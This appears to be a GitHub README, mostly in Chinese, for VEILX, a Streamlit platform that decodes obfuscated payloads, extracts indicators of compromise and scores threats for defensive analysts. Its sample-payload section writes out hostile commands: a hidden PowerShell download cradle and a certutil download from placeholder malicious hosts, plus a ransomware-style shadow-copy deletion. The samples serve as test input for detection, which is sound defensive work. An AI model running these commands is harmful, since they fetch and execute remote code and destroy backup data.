# VEILX

VEILX

威胁载荷解码与 IOC 情报平台

即时揭示隐藏威胁

## 概述 VEILX 是一个使用 **Python** 和 **Streamlit** 构建的网络安全调查平台，可帮助分析人员解码可疑载荷、提取失陷指标 (IOC)、检测恶意行为、计算风险等级并生成可下载的威胁报告。 它专为以下场景设计： - 安全运营中心 (SOC) - 威胁狩猎 - 事件响应 - 恶意软件分类 - 蓝队调查 因为手动解码恶意代码是一件极其折磨人的事。 # 核心功能 ## 载荷分析 - 多层 Base64 解码 - URL 解码 - Hex 解码 - 混淆检测 ## IOC 情报 - URL - 域名 - IP 地址 - 电子邮件 ## 威胁检测 - 威胁评分引擎 - LOLBin 检测 - MITRE ATT&CK 映射 - 基于特征的检测 ## 报告 - PDF 报告导出 - JSON 导出 - IOC CSV 导出 ## 工作流工具 - 调查历史 - 可搜索的记录 - 会话统计 - IOC 可视化图表 # 截图 ## 1. 主仪表板  ## 2. 高风险载荷分析  ## 3. IOC 指标面板  ## 4. IOC 分布图  ## 5. 导出报告  ## 6. 调查历史  ## 7. 会话统计  ## 8. 载荷解码示例  # 安装 ## 克隆仓库 ``` git clone https://github.com/YOUR_USERNAME/VEILX.git cd VEILX ## 创建 Virtual Environment ```bash python3 -m venv venv source venv/bin/activate Install Dependencies pip install -r requirements.txt Run VEILX python -m streamlit run app.py Then open the browser URL shown by Streamlit. Sample Payloads for Testing PowerShell Download Cradle powershell -w hidden Invoke-Expression DownloadString http://evil-login-update.xyz/payload.exe LOLBin Abuse certutil -urlcache -split -f http://badsite.ru/file.exe Ransomware Behavior vssadmin delete shadows /all /quiet Base64 Example aGVsbG8gd29ybGQ= IOC Extraction Example admin@corp.com http://secure-login.xyz/reset 185.55.23.19 Technologies Used Core Stack Python 3 Streamlit Data & Visualization Pandas Plotly Reporting FPDF Security Logic Regex Hashlib Custom Threat Rules MITRE ATT&CK Mapping ```

标签：Base64解码, Cloudflare, DAST, DNS 反向解析, Hex解码, HTTP/HTTPS抓包, IOC提取, Kubernetes, MITRE ATT&CK, Python, Streamlit, TTP映射, URL解码, VEILX, 威胁情报, 威胁评分, 安全分析工具, 安全可视化, 安全运营中心, 库, 应急响应, 开发者工具, 态势感知, 恶意软件分析, 情报平台, 搜索语句（dork）, 攻击指标, 数字取证, 无后门, 混淆分析, 网络安全, 网络映射, 自动化脚本, 解码器, 访问控制, 载荷分析, 逆向工具, 隐私保护